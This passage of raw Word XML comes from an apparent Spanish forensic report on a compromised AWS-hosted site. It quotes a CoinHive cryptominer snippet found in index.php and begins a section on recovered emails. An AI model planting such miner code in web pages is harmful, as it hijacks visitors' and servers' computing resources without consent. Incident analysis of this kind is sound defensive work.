        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>JavaScript: Lenguaje de programación interpretado, comúnmente utilizado en desarrollo web.</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A703AB" w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> que lo que hace es </w:t>
      </w:r>
      <w:r w:rsidR="00B34E81" w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>minar</w:t>
      </w:r>
      <w:r w:rsidR="00A703AB" w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> con la CPU</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>CPU (Central Processing Unit): Unidad de procesamiento central de una computadora, el componente principal que realiza la mayoría de las operaciones de procesamiento.</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A703AB" w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> bitcoins. Pudiendo realizar la ruptura del equipo. En este caso en los servidores de </w:t>
      </w:r>
      <w:r w:rsidR="00B34E81">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>AWS</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>AWS</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText xml:space="preserve">: Acrónimo de </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Amazon Web Services</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A703AB" w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, provocarían un exceso de ejecución de tareas provocando </w:t>
      </w:r>
      <w:r w:rsidR="00B34E81" w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>además</w:t>
      </w:r>
      <w:r w:rsidR="00A703AB" w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> posible incumplimiento de uso de las infancias EC2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4786B154" w14:textId="613482A6" w:rsidR="00A703AB" w:rsidRPr="00A703AB" w:rsidRDefault="00A703AB" w:rsidP="00A703AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">De </w:t>
      </w:r>
      <w:r w:rsidR="00B34E81" w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hecho,</w:t>
      </w:r>
      <w:r w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> el código del index.php tiene el siguiente script dentro del código</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49086EB2" w14:textId="3E17FCAA" w:rsidR="00A703AB" w:rsidRPr="009F0CF5" w:rsidRDefault="00A703AB" w:rsidP="00A703AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00927E54">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>var miner = new CoinHive.Anonymous('pvvxSQ6RzN3K5IY9F5fFHvahAFNreg3u', {throttle: 0.2});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638B81E5" w14:textId="5AD60783" w:rsidR="00A703AB" w:rsidRPr="009F0CF5" w:rsidRDefault="00A703AB" w:rsidP="00A703AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00927E54">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>miner.start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F500CB" w14:textId="01DECDD6" w:rsidR="00A703AB" w:rsidRPr="00927E54" w:rsidRDefault="00062086" w:rsidP="00062086">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Correos electrónicos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A42F96" w14:textId="378DBD83" w:rsidR="00A703AB" w:rsidRPr="00A703AB" w:rsidRDefault="00A703AB" w:rsidP="00A703AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Los correos electrónicos son evidencias en las que se comparten acciones relativas entre dos sujetos, es decir, comunicaciones. Puede resultar vital para entender todos los hechos ocurridos dentro del sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C56ACD3" w14:textId="18701999" w:rsidR="00A703AB" w:rsidRPr="00A703AB" w:rsidRDefault="00FF4835" w:rsidP="00A703AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:noProof/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251842560" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1F92B7B5" wp14:editId="7A670375">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1242</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>988032</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5396175" cy="1657350"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="1957556252" name="Grupo 60"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5396175" cy="1657350"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5396175" cy="1657350"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="1875858082" name="Imagen 94" descr="Interfaz de usuario gráfica, Aplicación&#10;&#10;Descripción generada automáticamente"/>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872230" cy="1657350"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="169746491" name="Cuadro de texto 1"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3991555" y="445273"/>
                            <a:ext cx="1404620" cy="415290"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:prstClr val="white"/>
                          </a:solidFill>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="3444395C" w14:textId="3C0DA84E" w:rsidR="001C78D9" w:rsidRPr="00EA794D" w:rsidRDefault="001C78D9" w:rsidP="001C78D9">
                              <w:pPr>
                                <w:pStyle w:val="Descripcin"/>
                                <w:rPr>
                                  <w:rFonts w:cs="Arial"/>
                                  <w:noProof/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve">Ilustración </w:t>
                              </w:r>
                              <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                                <w:r w:rsidR="00117A4E">
                                  <w:rPr>
                                    <w:noProof/>
                                  </w:rPr>
                                  <w:t>56</w:t>
                                </w:r>
                              </w:fldSimple>
                              <w:r>
                                <w:t xml:space="preserve">: </w:t>
                              </w:r>
                              <w:bookmarkStart w:id="140" w:name="_Toc155782623"/>
                              <w:r w:rsidRPr="0067781D">
                                <w:t>Listado de mails encontrados.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92B7B5" id="Grupo 60" o:spid="_x0000_s1211" style="position:absolute;left:0;text-align:left;margin-left:.1pt;margin-top:77.8pt;width:424.9pt;height:130.5pt;z-index:251842560" coordsize="53961,16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LKvHuAMAAFcIAAAOAAAAZHJzL2Uyb0RvYy54bWycVttuGzcQfS/QfyBY&#10;oE+NV7fVrZYDVa4NA0Yi1CnyTHG5WiK7JEtyJTl/k2/IJ/jHesjdlS9KkdQPXg1vwzNnzgx9/vZQ&#10;lWQnrJNaLWj/rEeJUFxnUm0X9O8PV2+mlDjPVMZKrcSC3gtH3178/NP53szFQBe6zIQlcKLcfG8W&#10;tPDezJPE8UJUzJ1pIxQWc20r5jG02ySzbA/vVZkMer1xstc2M1Zz4RxmL5tFehH957ng/n2eO+FJ&#10;uaDA5uPXxu8mfJOLczbfWmYKyVsY7BUoKiYVLj26umSekdrKE1eV5FY7nfszrqtE57nkIsaAaPq9&#10;F9FcW12bGMt2vt+aI02g9gVPr3bL3+2urbkzawsm9mYLLuIoxHLIbRV+gZIcImX3R8rEwROOyXQ4&#10;G/cnKSUca/1xOhmmLam8APMn53jx53dOJt3FyTM4RvI5/loOYJ1w8H2t4JSvraCtk+qHfFTMfqrN&#10;G6TLMC83spT+PkoPiQmg1G4t+do2A9C5tkRm4GI6SafptDcdUKJYBenfVGwrFJmNKMmE4xDhjfLC&#10;5uwzxqR2NbNSk619+AJRsN/I0pT45fLhq/r1l8Py9/i5DCelibME7oRlGSOs9rp6+OKxvxJwGmQd&#10;sAU4DTgWyLvV/JMjSq8KprZi6QzKA0jD7uT59jh8FtmmlOZKlmUQRLBbDhHFCyl+Iw2NzC81rwO6&#10;pm6tKEGnVq6QxlFi56LaCPBmb7I+1ISe4cGZsVL5pkidt8LzItyfA8dfwB5ws/lxIYJ+xBkichD2&#10;j0p5OJ0MBkM0iRdSPgoSHFrnr4WuSDCAFRigAjZnu1vXoum2tJQ2ACIy4Aklhj7nOvYwOuHvf5Xy&#10;XcGMAITg9on2xrPJaDyagchGequaZVYHmXkUriYx5e2ZUPvEH/7QqObj/H/wNpzN+mmKakexj0bp&#10;YDJsctN1g/6oNxoPWgpH/XQwi83gtQwit7qUWSe7QO2qtGTH0Mz3hWx0HhTwdFepQkaUDqcagYQZ&#10;NBPXqiFY/rA5xDJFMNgUpjY6uwcTViOxiMAZfiVx4S1zfs0sHgVM4qHz7/HJS71fUN1alBTafv7W&#10;fNiPBGOVkj0emQV1/6DM0YHKG4XUw6XvDNsZm85QdbXSCBVpBJpo4oD1ZWfmVlcf8f4twy1YYorj&#10;rgX1nbnyGGEB7ycXy2W0m0Z2q+4M2l8/yjcQ++HwkVnTCjuo5J3uxHWi72ZvoNmZJVrPlYzif2Sx&#10;5RtCj1Z8vWA9ex6fjuOux/8HLv4FAAD//wMAUEsDBAoAAAAAAAAAIQBUIh99g9wBAIPcAQAUAAAA&#10;ZHJzL21lZGlhL2ltYWdlMS5wbmeJUE5HDQoaCgAAAA1JSERSAAAE7QAAAhwIBgAAAKrFWpgAAAAB&#10;c1JHQgCuzhzpAAAABGdBTUEAALGPC/xhBQAAAAlwSFlzAAAOwwAADsMBx2+oZAAAAGNpVFh0U25p&#10;cE1ldGFkYXRhAAAAAAB7ImNsaXBQb2ludHMiOlt7IngiOjAsInkiOjB9LHsieCI6MTI2MSwieSI6&#10;MH0seyJ4IjoxMjYxLCJ5Ijo1NDB9LHsieCI6MCwieSI6NTQwfV19hdvtJwAA/zZJREFUeF7svQtg&#10;VdWd7/8Nb1QENA98tL4Sm8fRtlZbm1SE1kfSoToIkXbGudSpDYzcsWS8dB73Msowr0pvE52mhYwz&#10;I/7b26GA9EFNfAJpSbVqbesJiSa+HxgSFQQChJDzX7+1195nn3P2Pmefk5OQwPfTLtnrvdbea+3s&#10;9Tu/31o5e/fujYAQQgghhBBCCCGEEDJqGGf+JYQQQgghhBBCCCGEjBIotCOEEEIIIYQQQgghZJRB&#10;oR0hhBBCCCGEEEIIIaMMCu0IIYQQQgghhBBCCBllUGhHCCGEEEIIIYQQQsgog6fHEnISMvuBw+aK&#10;eNHy1SnmihBCCCGEEEIIOT5Q044QQgghhBBCCCGEkFFGRpp2kUhEu/379+PQoUMYGBgwMUNj3Lhx&#10;OPvss43PG6n36NGjOHbsGHJyckxo+khecRMnTnT8hGSTwcFBvPXWW3pcD5VJkyZh/PjxmDFjhv53&#10;qNx///248847jY+4+b//9//itttuMz5CCCGEEEIIIeT4kJHQTgRmH374oRYenH766VqgMFREwPHq&#10;q6/iIx/5iAnx5siRI1oIMmHChCEJ2kT4J8JGqVfKyoYghBA3fX19eozl5uaakMzp7+/Xc+7w4cPI&#10;z883oZkjQru/+qu/Mj7i5jvf+Q6FdoQQQgghhBBCjjsZqQCJoOvgwYNa60c01WzNu6G6INhCtqFq&#10;xkl+KUfKE0dIttm7dy+mT5/uOdZt98Ybb+D555/H73//e7z33nueacTJPJOyRGiXLbzqoeMWn4QQ&#10;QgghhBBCRgcZCe1kYSsaRKLxFr/g9XJiQusVHu+CCM8knf2vnxNNQK/weOcuh5BsI9pxosHpHnMy&#10;F0SYJ9eiNfrd734XK1as0FpvDz/8sJNO0sgcs/3ipKxsCpjdZdNFHSGEEEIIIYQQMhrIWGgXxInQ&#10;4dvf/jaqqqrw9a9/PUEI4eVSkSyNxInG0q9//Wu8/PLLgcsLko6QdLHHlu1kD8gHHnhAm1/+6le/&#10;ws9//nOtaSeIAFzGbUtLC3bs2KHTNDU1JZQhbuR5BH8x4Src22W8Nl334iqvcD/STU8IIYQQQggh&#10;hJzEZLxDfiqNH9F2+8d//Ec888wzuPjii/X+XqnypKNp54XEiXbT1KlTtanhSy+9lFLIcXyEIORk&#10;wD2exaz1hz/8IbZu3YqnnnpKH3awfv16PU4FGYednZ249957tZM0IuDbvn27jrc5bpp2XukvugMt&#10;R1twx0Vx4Y5rxtIJV6G+0/hTph8djhBCCCGEEEIIGQ0MSWjnteAVJxp1d999N7q6unDhhRfqE2EX&#10;LVqk95DzSm+7IAKJZGlEW0kOspCDMaZMmaI37u/o6NBl+5FNIQghbtxzRMxi33nnHX3ysfhlT0gx&#10;j5Wxeuqpp+KUU07R+9YdOHBAO0kjgm7JY5chLpvj1V1uKmcyJISncpnmO56OEEIIIYQQQggZDWRd&#10;aCeabqtWrcLrr7+Oj370o1ogcdlll2H+/Pme6d0uiEDCK5/biYDwzDPP1Pt/TZ48WQtHRHCXbJ87&#10;QoYD9xyRQyS+8IUvaOGcINqg11xzDf7pn/4JGzduxH//93/jm9/8Jj7+8Y9r4bYg8+f666+PGavH&#10;T2jnFd6M2yfNxr1ak64T986epIWQ4qy4L+F+/Br/q1SF3d4cl95c33u7k2f2vZ0q3JTdeS9mO+H3&#10;uvINvyOEEEIIIYQQQkYDQxLaxTvRHLrrrrv0Pl2i8SYCioqKCtx0003aPNArT7xLRapFtQjnzj33&#10;XOTn52vNO7fgzisvF+lkuHCPaxn/3d3denzKycUyL5YuXYqSkhI9BkXI/NnPflYfSCGCO0HyvPXW&#10;W3peucvKFlJvMCciO53DP/yR72BF2c90m8VFItfhu4d/hq/hSqxpU2HfvS42vb5+Cis6brDy/Oxr&#10;eGrFd/CILvcR3F62AmU/s8r6D2zG/U6+4XeEEEIIIYQQQshoIGOhnZfmmhw6sXv3bi2wmzZtmg7b&#10;smULvvSlL2mNIdE0EnfjjTfiwQcfTMgvZaYiPs+bb76Jp59+Gjt37tSutbVVu7fffluntwV3Yp4o&#10;e4bF5xdHyHBgzxEZo//wD/+g54JtEnvdddfpcRk/Fs844wzccMMNOs27776LhoYGvTeklCHxQeZI&#10;UOLrTub80jvhF34MV/7HDZhzX5d3vIcfuBL31F5r+a+9AV9DGzq61HVXB9quvAe111rpLvyff6vi&#10;0mvvUBwhhBBCCCGEEDIayKp57CuvvKK13E477TQtLBPtITELvOCCC3DppZdqM9lPfvKTWqj3y1/+&#10;MiZvUC2i+DS9vb1awCF1ihNzXNnPTuoWjSZx0hZJI3uFxZNNzSVC3NhzRA6beP755/W/4hfz1+Li&#10;4pjx73YyVySN5Bcz82effdbJO2rH60V/iW2HDuF+3KZNf//noyacEEIIIYQQQgghGZFVod21116r&#10;TWJFSCaI4EwEaWKqetZZZzlODqe49dZbE/KLS0V8mvPOO0/XKUI528mG/rbQTrAFd9KOeILUSUgm&#10;2HNExp/9ryDXcliL/OvlJM7GnVf+zabQzl1nSmdlSBl+4f98Ei/ccyXaXjQad/H53H6/uAsvRulT&#10;38R3HrHCu/7tX/Af8WmH0RFCCCGEEEIIIaOBrArtbrnlFlx88cWOYEH+DYVC+iRZMQ8Ut3r1an1Q&#10;xezZsxPyBxFIxOfJzc3FJZdcovcBs51oKs2cOVPH23lE40829nfntR0hw4E9R+RwlD/90z9FYWGh&#10;Fr6JUE5MuuPHoe1aWlr0KbOibSd73y1evFiXIXFB5khQ4uv1d5L6KXzzklO0gFzc5/9NhHK6GCvN&#10;o//Tibvkm6X4m2UXqvBrccOfm3z/89HY9DHX8f5r8W8/+XP85x9b5X09Mh9/HpN2eB0hhBBCCCGE&#10;EDIayNm7d2/aq1TZl+sPf/iDFo7FI3vZyWmYL730kt5/S8xXxRy2pqbG0cDzQtK2t7fjU5/6lAnx&#10;Rjbzl9Nh/ZBF92uvvaZNYUXoIUISW2AngpB4xOxwxowZen8xQrLJM888EzNHZK/F73//+/pgFBE0&#10;f+Mb39B72Lnp6urCv/3bv+nDXEQjVU6ULSgoMLHQ8+6KK64wvsy5//779UEYY4KXv4svfPwl/M2B&#10;+3CtCRpO1q5di9tuu834CCGEEEIIIYSQ40NWNe3Effjhh1i4cCFKS0t1OtGUkf28/v3f/90zvdtl&#10;omkX70Rg98EHH2gBoQjsRCAnQsP+/n7P9OIIGQ685ogg/7a1teG73/0ufvvb32rNOzkl9fHHH9cC&#10;Ozl0QhBBtph5u/MfH0274+serf8bPP2Zi3GBR9xwOEIIIYQQQgghZDSQdaGdOBHczZ8/X5vGitBO&#10;Dqf43e9+55nW7YIK7ZKxb98+rTUnwg4R2EndXhp2NqnKIyRT3HNExqWYvYqWnSACORFmf+tb39Lm&#10;r1/72tfQ2NioNezsMfnWW2/hiSeecMoQd3II7brw3Wumaa1dcTf9163Y/NjtuNAzbfYdIYQQQggh&#10;hBAyGhiS0C4ZIqS46aab9J5cIjz7whe+YGL8CSKQSJUmLy9PH0Qhh06kEtgJ2RSCEOLGPbbkVGM5&#10;OVkOZhGz7fPPPx+zZs3SWnZ9fX3aicBITGLlcBUROsv4lT0a3Zwc4/UiLHvsQy38t9y9I2IWSwgh&#10;hBBCCCGEjCbG/83f/M3d5jowIjgQLSA5CTYZYvL3sY99DNdff73ew0v8fkiZ7777rt57LhmyiBfB&#10;hx+yR5gIQ6ZOnRpzCqcfsvedlCdCEkKyyeuvv+7METHVvuiii/TBKTLGv/rVr2oT8s7OTi3glvgr&#10;r7xS7zM3Z84cPSa/+MUv6oNd3LzzzjtaqDdUxCz3sssuMz7ihveGEEIIIYQQQshoICNNOxEwiJBL&#10;tNjiTcvinQjZdu/erfeZ84qPd0EQ00KvvOJk77pDhw4FapuUI0h/CMk2ovEZv5eiaJ4uWLBAH44i&#10;WnX2oSoitL7gggu0pqicfCzm5UVFRTF57bKyhbtsuqgjhBBCCCGEEEJGAxmdHivCLjkdVhAz1Gyc&#10;vCpl/v73v8fs2bNNiDdyeqwIDMXccCjacVKf7C8m/4r2EzXtSLZ55ZVX9EnLchCKH6I5JwJtERyf&#10;ffbZ2pTcCylnz549WitPNPKGipweyxNSvZF7QwghhBBCCCGEHG8yEtqJNooIGuSUSxEi2BprQ0UE&#10;F2IamAwxZ92/f78WYsgJsZkifZD6ZKN7EZRQ245kGxmnO3fuzIpQW7T2ZMyKmbmfYC8dKLQjhBBC&#10;CCGEEEJGNxkJ7QQRIIhJnzi5FjcURGgmToQTyciGiaBdlwj9xFFgR4aL0TpeKbQjhBBCCCGEEEJG&#10;NxkL7QghYxcK7QghhBBCCCGEkNFN5valhBBCCCGEEEIIIYSQYYFCO0JOWh7H8hkz9B55trvue6+Y&#10;uBQ8vtzKc933EDBHHFL3dQhaHSGEEEIIIYQQcrJBoR0hJzWfxj//di/27hW3CaV/dxlmLH/cxPnx&#10;OJYvfABf3aTyPHo7LjShmUMBHiGEEEIIIYQQEg+FdoQQwzWo/+0/49MPbEUqsZ0I+y4eurSOEEII&#10;IYQQQgghPlBoRwiJcmEl/vjTD2CrLbV75Xu4zjGfXa4CRCtuIR7Ab/B3l0XNaR9fHjWxjWrqxWvQ&#10;JWrU3X5hbHmptfwIIYQQQgghhJCTAwrtCCE+PI7ll/0Ef2ybz24CrvvehahXF181ZrWP3m6p211T&#10;HzWx/eoD9wQ2df3eK9fElLe3/hoTQwghhBBCCCGEnNzkRBTmmhBygrJv3z5zZXH//ffjttvOx/IZ&#10;9+Di3z4KI3tTvILvXbcUWKvC8D1cd9nf4TcmRvPVTdhbj8R8cjDFwgeMRwRwEidadO50br/ftS6A&#10;EEIIIYQQQgg56aGmHSEkyivN+MlvSl371X0Vm7QGnXFemnBiQrsQJt1v8c+fNuGEEEIIIYQQQgjJ&#10;GArtCCEGMYf9O5RuqocWzV14MUrxAO5JZev6ykv4zacvtk6R1UI/Haq4EBd/+jd4yc7++FZVGiGE&#10;EEIIIYQQQoIwbEK7wcFBfPazn8Xll1+e0h04cMDkIoSMLOYACH2IhJio7kVUmc46TVYl8DhkwsU1&#10;d+Cf8Xe4TOKXvoRSR9PuQtz+za/igYUm71bR2/PiGsz7Kg+iIIQQQgghhBBC3AzbnnbvvPMOvv71&#10;Gvznf/6XCfFmyZKv495778V5551nQggh2cZ7T7vbjI8QQgghhBBCCCGjjQSh3WOPP4H2XW3Gl0hJ&#10;aRmuveYLxudPa2srvve9tbjssstNSJRPucK+v/a7uPPOWlxxxRUmJBXNWJJThUbjE8rrOrFzeaHx&#10;ZZnmJcipsmurQVNkHSqNj5CxAoV2hBBCCCGEEELI2CLBPFYEdsuWLfN1yQR6bt566y3MnDkTl4Qu&#10;TXD9/f2OO+3UU/Hee++ZXEEpR11nBCJvjESaEKotQs6SZhPnhwj7KlDfZbxB6KpHRRXQpOtRrrME&#10;HamqIYQQQgghhBBCCCFkiKTc0+6S675prtLjtddew8wZZ+DIkSPaFczKi3F2+NRTTslAaOemEus6&#10;61DeuAVZl6d1taO1vASODl/hciynmh0hhBBCCCGEEEIIGWY8hXaDkYjjvPxBkD3tTjttmqNR99hj&#10;j8c4O3zqlKEK7RSF81Bd3ogtRmrXvCQHOTnGaQ0826S2FbVFdphXujgq56OmtRaLvdTzRAvPzqtc&#10;NHu8Rp/bb10vWVKh8iwxQsYu1Fd4lBNTfoq0hGTAwMAA+vr6cPDgwVHppG3SRkIIIYQQQggh5GTE&#10;V9Nu/tJN2l14wRXOtZtVq1bF/BuPCO1OPfVULZj7yEfPwezZV+Gcs8/VTq4lTOImTZ6EDz74wOTK&#10;DpXroqazNY2rUd9ViXVybZvVrrPU5RLT6WAXkq8T1RuL4oRkzVhSVItQk8nfWYdwVVDT21aES9ar&#10;fLI3ngjhirCxutO0IwKraVL+RlTbJsBNwGopvHkNakNNcWkJyQyZf3Kqa25u7qh00jZpIyGEEEII&#10;IYQQcjKScBDFfffdh1tu+VPjAz5X/c/41ca/Mz7gBz/4Ie644w7j82ZwcBAVFRWYfdVc7T/Yd1D/&#10;e+opp+p/4/0HDu5DQ0ODvk6NaKutRknnTkTPnhDh12JgvQmLOTxCBHUS7pHPM53xxiOab0ZQt65Q&#10;rtux0nUohWjtbZkvgrT4etz+uDhdZmw5GlNXq/FqapoQWdGhw1VDh+/gDXJC4nUQxVe+8hUtHBvN&#10;9Pb2mquTG/nRYNKkSXpLgZMBu78TJkwwIYQQQgghhBBy8uGpadfXd8hxXv5UiFnb7t27seHH/0+7&#10;rVt/qp1cb/nFT/HbV7vwypE+/PrlF/HT5q3YsmWLyZkhXVuxsTWEYlsQ5hwe0Ym6citJAkHT2RQu&#10;x3qVqNG2wR125KRao2knTtTqVBt2quv1WEzzWHLScPrpp5/0ztZa9oo7EZ3dX0IIIYQQQgg5mUl5&#10;EMWj62vNVXBOO+00vP76656uZ98+FPzpn+Kj3/42Plpbiw8OH9YCvsxpNqaqRlvNfXiEFubJhQdB&#10;0jXXu0xeu7BVJSovUTkKixFCdA89EQCubqzBfN2AQpSUt6Ldzte8RaX0wezFp01f3ZjyE8INhct3&#10;orOuHOEO73hCyInFuHHjtPD+ZOFk6y8hhBBCCCGEeJEgtCspLcNDDz3k6yR+KBw9dAivP/ww3nnw&#10;Qbz64x/jyIEDJiYdzIESOeLE3NS1v1vlCtShFkUSt7gdIUeDrhLza1wHUfimc1FZjHanniK9n5xl&#10;lmqdWBuuMnF6/znbxLUQy1fWoNGO2yI6c36otDubEKq19swTZ2nPWeWrxjrhus1izmv8RbUhrKSJ&#10;LCGEEEIIIYQQQsgJScKedvHIQRN33XWX8QVHBEtejBs/HhOnTsXEKVNw7OhRHDl4EIMDA9SqIGQY&#10;Gct72om5JAE+/PDDk+peSH/FTJYQQgghhBBCTlZSmsemK7CTjdIPHDigT4Tds2ePPkX2zTff1Kax&#10;r776Kl7u6sJLbW1of/55vNLRgXdVvKSVPCfLJuuEjHYeWTYZkycnuqvv8zPJfgTLJl8N7+hkcYQQ&#10;QgghhBBCCPEipdBONO0IIScX1zcc0UL0I0d+httwJda0Wf4dd9Ake1Ty7vP4xS9+YdzzeNcEE0II&#10;IYQQQggZu2Rd0060ceQgihkzZiAvLw9nnXUWzj33XHz0ox/F+eefr51cS9isWbN0GkkreSQvIYSk&#10;4rE7pmHatER3TcODuGPaNWh42SQcFh7Lbh0vN+Aap7wMyj7QiZbngE/duACLFi3CoqozcGTvFEww&#10;0YQQQgghhBBCxibUtCOEpEWM6eyyR0yo4eX7cLWJ8zWl7YqmmTx5GeJKCMS19+3H/v3iHsKt+Az+&#10;9XeW//FlZ5kUY4iLluHx/Y9j2UXGny4HDmD/tOnInQIcVtcHxp2H884YxDhK7QghhBBCCCFkTJN1&#10;TTtB9q/75S9/mZaTPISQ0U+M6ez9/+zaq+4prPhn4D8krm0NsOJrHvvYPYJlZZuxwJjbqiLwz9zs&#10;bmjMOgtn72/HU+F9GDRBGOxH/8C7eP4XLeh0Duh2+831u51oMWa1z78rSnstjplti5MxnbRiqWuF&#10;aScJrVBdxvPPt6jrA+hsscpwEPPelk4VQwghhBBCCCHEZlg07d544w1ceeWVuOqqqwI5SSt5CCFj&#10;gEeWGS25G3C/CbK4Emv+4w7oXe8K78Df3fYUXow38+x6EWER7pUZTbsb7sdTCYmywCticmqbzNrl&#10;x5ueuv3m+rFovjseE8vVa1ymt3HtTFZHwx2e+WLMeqUCKzR9k9gYZuGTf/R5nPPW4/i5EahFycGE&#10;U07BJOdN7/bvx0tdE/GZG+ejuuKjeOc5lXfcZfjS/GosUv79L72KD5yMwdPO+uQf4cYFi7Bo